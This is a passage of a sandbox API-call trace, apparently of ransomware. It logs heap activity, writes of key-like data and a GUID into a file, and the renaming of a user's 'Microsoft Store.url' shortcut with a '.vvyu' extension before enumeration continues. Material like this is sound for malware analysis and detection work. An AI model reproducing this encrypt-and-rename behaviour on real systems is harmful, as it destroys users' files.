returned 1 [0189.256] GetLastError () returned 0x0 [0189.256] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.256] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.256] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.256] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.256] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.256] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d390f0 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39138 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.257] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39958 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.261] GetCurrentThreadId () returned 0x264 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43a60 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.261] GetCurrentThreadId () returned 0x264 [0189.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39970 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39940 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399d0 [0189.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399e8 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39138 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.272] WriteFile (in: hFile=0x584, lpBuffer=0x794008*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x794008*, lpNumberOfBytesWritten=0x30ffb14*=0x81, lpOverlapped=0x0) returned 1 [0189.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.272] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.272] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.273] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.273] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.274] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.274] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.274] CloseHandle (hObject=0x584) returned 1 [0189.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0189.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.276] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url.vvyu")) returned 1 [0189.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.277] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0189.280] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0189.280] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0189.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0189.281] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0189.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.281] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0189.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0189.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0189.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0189.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0189.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.286] 